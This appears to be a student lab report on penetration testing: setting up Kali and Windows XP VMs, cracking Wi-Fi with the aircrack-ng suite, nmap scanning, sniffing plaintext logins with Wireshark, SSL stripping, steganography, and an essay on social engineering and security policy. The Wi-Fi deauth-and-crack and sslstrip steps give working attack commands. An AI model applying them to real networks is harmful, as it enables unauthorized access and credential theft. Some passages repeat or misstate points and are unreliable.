Task 1:

Run the VMware Workstation and click on Create a New Virtual Machine option.
Kali Linux:
Step 1: - Now select the Kali Linux image file in Installer disc image file and click on Next.

Step 2: - In this step, select the type as Linux and also select the version of Operating
System.
Step 3: - Now give the location where we have to save the virtual machine and also give the
name of the Virtual Machine.
Step 4: - Now select the size of the virtual machine hard disk and also select the option
whether we have to split the size in multiple disks or not.
Step 5: -Now our virtual machine is ready to create. Click on Finish to run this machine.
Step 6: - Now in Kali Linux installer menu selects the graphical install to install the Kali Linux.

Step 7: - Now select the language that is used in installation process.

Step 8: - Now configure the username for the system and click on continue.
Step 9: - Set the password for the system.

Step 10: - Now if we want to install any additional software, we can install them in this step.
Step 11: - Now if we want to install the GRUB boot loader then click on Yes else click on No
and then click on continue.
Step 12: - Now select the location where we have to install the GRUB boot loader and click
on Continue.

Step 13: - Now as we can see our system is ready to use.

Windows XP: -
Step 1: - Firstly, run the VMware Workstation and import the Windows XP ova file. Also
select the location where we have to save the virtual machine and click on import.
Step 2: - Now as we can see that our virtual machine is importing. Wait until it is importing.

Step 3: - Now our machine is ready to operate.

 TASK - 2

A) WIFI Hacking:

● First, with the help of the below command look out the name of your wireless interface.
○ #iwconfig
● Write the below command to enable the monitor mode on your Wi-Fi interface: -
o #airmon-ng start <interface>
● As we can see that our Wi-Fi interface is observing all the traffic which is received on
wireless channel.
● Now, all the wireless traffic can be captured with the following command:
● Now, for collecting the wireless traffic write the below command:
#airodump-ng <MonitorModeInterface>

● Now, all the available essid will be shown.

● Now, select the essid for which we want to figure out the credentials and write the observed
data into a file with the help of the below command:
o #airodump-ng -bssid <enter bssid> -c 2 --write <capturefilename> wlan0mon

● De-authenticate the device which are connected.

#aireplay-ng --deauth 100 -a <Macaddress> <Monitormodeinterafce>

● Now, crack the password using aircrack-ng
● With the help of aircrack-ng crack the password.
● Use the below command to crack the password using wordlist:
● For cracking the password using wordlist, write the below command.
o #aircrack-ng <capturefilename> -w wordlist

Hence, we can see that we have figured out the password of a particular bssid and got inside
a network.

B) Scanning
As we entered in the network, we will do various scans to find the vulnerable devices.
● To find all the open ports and services of all the devices in the network. We will use the
following command:
● Write the below command to see all the open ports and services of all the targets in the
network.
#nmap -v 192.168.69.*

● As we found that the vulnerable target is 192.168.69.130. Let’s do a scan on it.

 After completion of the scan, we see that there are numerous open ports and they can be
vulnerable.

● Below screenshot shows the details of the port ftp(21).

 We found out that FTP port is vulnerable to anonymous login. We can enter into ftp

using username: anonymous and password: anonymous.

As we observe that port FTP is vulnerable to anonymous login. With the help of username:

anonymous and password: anonymous we can enter into FTP.

● Use the below command for scanning all the ports of a device:
# nmap -p- 192.168.69.130

● With the help of below comaand we can do an aggressive scan:

# nmap -A 192.168.69.130

C) Man-in-the-middle Attack
With the help of Wireshark, capturing HTTP traffic.

● Firstly, in hacker’s machine open Wireshark.

● Choose the interface whose packets we want to collect.
● Now, as we can see in the screenshot that all the incoming and outgoing packets are
collecting in the Wireshark.

● Type http://testphp.vulnweb.com/login.php in the address bar of browser and press enter.

Now, enter username and password as admin:admin
● Now, in the browser’s address bar type http://testphp.vulnweb.com/login.php and click
enter. Enter username as admin and the password is admin.
● Now, in Wireshark select the login packet whose id and password we have to see in plain
text with the help of below command:
❖ Select packet → right click → select TCP stream and it will show you
username and password in plain text format.

D) Attack for HTTPS

● We can read ssl keys and ssl traffic by applying the filter “tcp.port==443” to perform MITM
against HTTPS traffic with Wireshark.
● To perform MITM against HTTPS traffic with the help of Wireshark use the filter”
tcp.port==443 ” as with the help of this filter we can read SSL keys and SSL traffic.
● We can also perform SSL strip against the target.
First, start port forwarding in the machine

Now, open terminal and write the command that is in screenshot.

Look for the default gateway in the routing table:

With the help of spoofing change the gateway of target machine.

Now, run the SSL strip on the port 8080 with the help of below command:

sslstrip -l 8080
 Now, see the logs and check and also look the login id and password that used by the target.

Prevention Techniques

1. Make sure you are using latest browser with security enabled which finds attackers more
difficult to do an attack.
2. Use add-ons like “HTTPS everywhere” which notify you every time you visit a website that
whether it is using a secure SSL connection or not.
3. Always use add-ons like “HTTPS everywhere” which alerts us from the websites which have a
secure SSL connection or not.

E) Steganography
Steganography is a method to keep information secret by putting them inside audio, video or image
file.

● First, run terminal and with the help of the below command download that stegosuite tool if
it is not in your machine.
#sudo apt install stegosuite

Now, with the help of stegosuite command run the stegosuite tool.
Now write the password that we have to embed and by clicking on Embed we can hide the data in
the image file and that image file will saved on your system.

Task 3
Social Engineering & its toolkit
Social engineering is a terminology which encompasses a broad range and quantity of
malicious activity. Pretexting, Baiting, phishing, tailgating and quid pro quo are major attack
categories which are utilized by social engineers for targeting their victims. Social engineer
toolkit works with Metasploit operating system and enables client side attacks in harvesting
of credentials. Generally, an attacker is preparing one fake login page which is exactly a
mirror image of the actual website’s login page. This fake page’s link is shared with the
target customer. And, the target victim is not capable of distinguishing between a fake login
page and an actual page. Finally, the victim will enter their credentials and it will be stored in
the hacker's database. Hacker or Attacker can misuse their illegally stored credentials for their
own personal benefit purpose. 
Social engineering toolkit is considered as an open source framework for penetration testing
which has a lot of custom attack vectors by allowing them to be believed within a fraction of
time. Social engineering toolkit has support for various properties like support on multi -
platforms like UNIX or Linux or Windows, supported with integration with the 3rd party
modules and allowing multiple tweaks from various configuration menus. Social engineering
toolkit includes the testing platform of fast track penetration. Social engineering attacks are
having various options like website attacks, mass mailing, power shell attack vector, QR code
attack, Arduino based attack, spear phishing attack and infection media generator. These
types of attack categories are performed on various groups, organizations, staff members of
respective organizations as well as individuals, stakeholders or other entities.
Categories for Social Engineering Attacks
Pretexting, Baiting, phishing, tailgating and quid pro quo are major attack categories which
are utilized by social engineers for targeting their victims. Phishing is a widely used and most
common attack category of social engineering in which it is used for storing personal
information such as address, social security number and name. Hackers utilize misleading
links which redirect them to access unsecured websites. Generally, they utilize email
platforms for sharing malicious & misleading links. Pretexting is another form of social
engineering attack in which hackers are designing good qualitative content based on
fabricated scenarios to steal the personal information of victims. Phishing attacks utilize
urgency and fear for their own advantage whereas pretexting attacks rely on creating false
sense by designing trust. Baiting attacks are not only limited to online schemes but also
focused on exploiting human curiosity. Tailgating is also known for piggybacking in which
an attacker will be following an authenticated employees and their access.
https://www.tripwire.com/state-of-security/security-awareness/5-social-engineering-attacks-
to-watch-out-for/
Security Policy Awareness Guidance
Security awareness is categorized as a proactive method in the workplace with respect to
dangers of offline as well as online threats. Security policy will ensure a constituency of
critical information and procedure to secure it from internal threats and external threats.
Security policy awareness guidance is really helpful to employees in understanding actual
cyber hygiene along with associated security risk. This security risks with respect to
identification and action of cyber-attacks. These attacks can be encountered through web and
email. While designing security policy awareness guidance, do not forget to ensure about
below properties which are related to enforcement of policy, its applicability and
implementation through procedures of system administration.
Your security policy awareness guidance should have major 5 key elements which are:
authenticity, integrity, confidentiality, non - repudiation and authenticity. Information and
data assets should be confined to the license of individuals which should not be disclosed to
other people. This helps in ensuring accessibility and authorization of information for which
an employee or user will be having access. Integrity will help in ensuring maintenance,
trustworthiness and accuracy of data. Availability is assurance in which system becomes
responsible to store, process and deliver data which is accessible from only authorized
customer.
https://info-savvy.com/top-5-key-elements-of-an-information-security/
Effective security policy and system should have 4 core elements which are reaction,
verification, protection and detection. Protection is considered as a physical barrier and first
layer of defence with respect to trespass and intrusion. This works as a physical and visual
deterrent to cyber attackers & criminals. Information security policy has governed the data
protection which is required by every single organization and individuals. Major Key
elements of information security policy are purpose, scope, objective, Access Control policy
& authorization, data classification, Security awareness sessions, data support & operations,
Personnel duties or rights or responsibilities, references to relevant legislation. 
Main reason behind designing security policy is for establishing an effective mechanism to
secure the information so that critical data can be utilized for misuse. This will help in
maintaining the organization's reputation in terms of legal & ethical responsibilities. Effective
information security policy will have facilities, technology, user, programs, systems,
information and other supportive infrastructure. Information security policy needs to be
highly concerned towards strategy & security. This will help in ensuring quality, workability
and completeness. Data & Information related assets should confine with respect to
customers who will be having authorized access and not disclosing anything to those
identities who are not having any relevance to this. Data integrity will help in keeping and
maintaining information more accurate, complete, IT (Information Technology) systems
operational. Information or data set is available based on authorization of customers
whenever it is required. 
Access and authorization control is required because in an organization, there are a lot of
people and stakeholders from various domains. If everyone has access to critical information
then it becomes highly dangerous to the working infrastructure of an organization. An
employee might share critical information to a competitor or bad wisher of the organization
and here is a data breach or security breach scenario in which critical information is shared
with others. A junior post staff is not capable of efficiently taking decisions however a senior
level management has good capability, knowledge and authority to make decisions like with
whom & what type of information can be shared in an organization. Data is classified majorly
in 3 categories which are high risk class, confidential class and public class.  High risk classes
contain data protection by federal & state legislations, personnel, payroll and financial.
Federal & state legislations need implementation of FERPA, HIPAA and Data protection act.
Personnel contain privacy requirements. Confidential information is not maintained and
protected as per law however based on data owner judgments and public class information
can be freely shared & distributed. 
Data protection, data backup and data migration are major 3 supportive operations to an
organization. Sharing IT security policy and guiding staff members is one of the major
critical steps. For this, one training session & awareness session should be conducted so that
every single member of an organization can understand the importance of data security &
information security. This session will also contain data deletion, data collection, data
utilization, records management, privacy, correct utilization of social networking,
confidentiality, data quality maintenance and actual utilization of information technology. An
information security policy contains intrusion detection system, remote working procedure,
employee requirement, virus protection mechanism, technical guidelines, consequences of
non - compliance, IT physical security and necessary support to documents which are stored
as soft copy & hard copy.
https://resources.infosecinstitute.com/topic/key-elements-information-security-policy/